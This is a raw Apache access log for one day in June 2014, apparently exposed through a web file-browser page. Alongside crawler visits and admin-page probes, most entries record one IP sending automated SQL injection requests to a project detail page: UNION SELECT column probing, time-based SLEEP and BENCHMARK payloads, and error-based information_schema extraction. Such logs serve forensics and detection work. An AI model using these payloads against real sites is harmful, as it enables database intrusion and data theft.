0byt3m1n1
Path:
/
data
/
0
/
0
/
22
/
101
/
22427
/
meta
/
22906
/
logs
/
[
Home
]
File: x-access_log.2014-06-20
86.107.43.19 - - [20/Jun/2014:11:04:37 -0400] "GET /project/detail.php?id=10%27%20AnD%20sLeep%283%29%20ANd%20%271 HTTP/1.0" 200 4143 "-" "Opera/9.27"
180.76.6.28 - - [20/Jun/2014:12:50:20 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
199.21.99.203 - - [20/Jun/2014:18:14:53 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
100.43.91.15 - - [20/Jun/2014:18:39:16 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
86.107.43.19 - - [20/Jun/2014:11:04:18 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; InfoPath.1)"
86.107.43.19 - - [20/Jun/2014:11:04:29 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)"
86.107.43.19 - - [20/Jun/2014:11:04:48 -0400] "GET /project/detail.php?id=10%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)"
216.172.56.37 - - [20/Jun/2014:22:59:29 -0400] "GET / HTTP/1.1" 200 3934 "http://privhosting.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
86.107.43.19 - - [20/Jun/2014:11:03:32 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial"
86.107.43.19 - - [20/Jun/2014:11:03:53 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; yplus 5.6.02b)"
86.107.43.19 - - [20/Jun/2014:11:04:09 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; E-nrgyPlus; .NET CLR 1.1.4322; InfoPath.1)"
86.107.43.19 - - [20/Jun/2014:11:04:15 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:04:36 -0400] "GET /project/detail.php?id=10%26%26SlEEp%283%29 HTTP/1.0" 200 4143 "-" "Opera/9.27"
100.43.91.15 - - [20/Jun/2014:18:39:08 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
100.43.91.15 - - [20/Jun/2014:18:39:08 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
86.107.43.19 - - [20/Jun/2014:11:03:44 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:03:51 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
130.211.140.244 - - [20/Jun/2014:10:20:57 -0400] "GET / HTTP/1.0" 200 3934 "-" "NerdyBot"
86.107.43.19 - - [20/Jun/2014:11:03:35 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
86.107.43.19 - - [20/Jun/2014:11:04:13 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
162.243.159.197 - - [20/Jun/2014:07:03:28 -0400] "GET / HTTP/1.1" 200 3934 "-" "Comodo-Webinspector-Crawler 2.2.1, http://www.comodorobot.com"
86.107.43.19 - - [20/Jun/2014:11:03:50 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)"
78.158.11.226 - - [20/Jun/2014:13:39:25 -0400] "GET / HTTP/1.0" 200 3934 "http://www.google.com/url?sa=t&rct=j&q=readandcompany.net&source=web&cd=5&ved=0CF0QFjAE&url=http:%2F%2Freadandcompany.net%2F&cad=rja" "Lynx/2.8.5rel.1 libwww-FM/2.15FC SSL-MM/1.4.1c OpenSSL/0.9.7e-dev"
130.211.140.244 - - [20/Jun/2014:10:20:57 -0400] "GET / HTTP/1.0" 200 3934 "-" "NerdyBot"
86.107.43.19 - - [20/Jun/2014:11:03:33 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; E-nrgyPlus; .NET CLR 1.1.4322; InfoPath.1)"
86.107.43.19 - - [20/Jun/2014:11:03:53 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; Sgrunt|V109|1746|S-1740532934|dialno; snprtz|dialno; .NET CLR 2.0.50727)"
5.9.112.245 - - [20/Jun/2014:03:13:51 -0400] "GET /wp-login.php HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/23.0.1271.17 Safari/537.11"
5.9.112.245 - - [20/Jun/2014:03:13:51 -0400] "GET /administrator/ HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/23.0.1271.17 Safari/537.11"
5.9.112.245 - - [20/Jun/2014:03:13:52 -0400] "GET /admin.php HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/23.0.1271.17 Safari/537.11"
207.46.13.115 - - [20/Jun/2014:20:34:33 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:04:31 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; yplus 5.6.02b)"
86.107.43.19 - - [20/Jun/2014:11:04:41 -0400] "GET /project/detail.php?id=10%20AnD%20BeNChMaRK%282999999%2CMD5%28NOW%28%29%29%29 HTTP/1.0" 200 4143 "-" "Opera/9.27"
86.107.43.19 - - [20/Jun/2014:11:04:53 -0400] "GET /project/detail.php?id=10999999.1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,%27ololo%27,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%201))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%20 HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
199.21.99.203 - - [20/Jun/2014:18:14:56 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.39.178 - - [20/Jun/2014:22:39:01 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.131 - - [20/Jun/2014:18:23:23 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:03:28 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:04:08 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial"
100.43.85.10 - - [20/Jun/2014:18:35:26 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
100.43.91.15 - - [20/Jun/2014:18:39:10 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
86.107.43.19 - - [20/Jun/2014:11:03:55 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)"
157.55.39.10 - - [20/Jun/2014:23:33:27 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:03:34 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial"
162.243.159.143 - - [20/Jun/2014:07:03:29 -0400] "GET / HTTP/1.1" 200 3934 "-" "Comodo-Webinspector-Crawler 2.2.1, http://www.comodorobot.com"
86.107.43.19 - - [20/Jun/2014:11:03:25 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)"
86.107.43.19 - - [20/Jun/2014:11:04:34 -0400] "GET /project/detail.php?id=10%20AnD%20SLeeP%283%29 HTTP/1.0" 200 4143 "-" "Opera/9.27"
100.43.85.10 - - [20/Jun/2014:18:35:22 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
86.107.43.19 - - [20/Jun/2014:11:03:58 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)"
100.43.85.10 - - [20/Jun/2014:18:35:19 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
100.43.85.10 - - [20/Jun/2014:18:35:19 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
100.43.85.10 - - [20/Jun/2014:18:35:21 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
86.107.43.19 - - [20/Jun/2014:11:03:40 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)"
86.107.43.19 - - [20/Jun/2014:11:03:57 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; SV1; .NET CLR 1.0.3705)"
86.107.43.19 - - [20/Jun/2014:11:04:06 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
86.107.43.19 - - [20/Jun/2014:11:04:22 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; E-nrgyPlus; .NET CLR 1.1.4322; InfoPath.1)"
199.21.99.203 - - [20/Jun/2014:18:14:47 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.203 - - [20/Jun/2014:18:14:47 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.203 - - [20/Jun/2014:18:14:49 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.203 - - [20/Jun/2014:18:14:49 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
100.43.91.15 - - [20/Jun/2014:18:39:11 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
130.211.140.244 - - [20/Jun/2014:10:20:57 -0400] "GET / HTTP/1.0" 200 3934 "-" "NerdyBot"
157.55.39.178 - - [20/Jun/2014:11:01:33 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:04:33 -0400] "GET /project/detail.php?id=10 HTTP/1.0" 200 4664 "-" "Opera/9.27"
86.107.43.19 - - [20/Jun/2014:11:03:26 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
86.107.43.19 - - [20/Jun/2014:11:04:15 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; E-nrgyPlus; .NET CLR 1.1.4322; InfoPath.1)"
86.107.43.19 - - [20/Jun/2014:11:04:27 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial"
86.107.43.19 - - [20/Jun/2014:11:04:29 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.3.04b)"
207.46.13.92 - - [20/Jun/2014:14:47:42 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.137.34.186 - - [20/Jun/2014:14:59:52 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/4.0 (compatible; Synapse)"
83.143.133.12 - - [20/Jun/2014:08:06:37 -0400] "GET /project/detail.php?id=10%26%26SlEEp%283%29 HTTP/1.0" 200 4143 "-" "Opera/9.27"
86.107.43.19 - - [20/Jun/2014:11:03:23 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; InfoPath.1)"
86.107.43.19 - - [20/Jun/2014:11:03:26 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)"
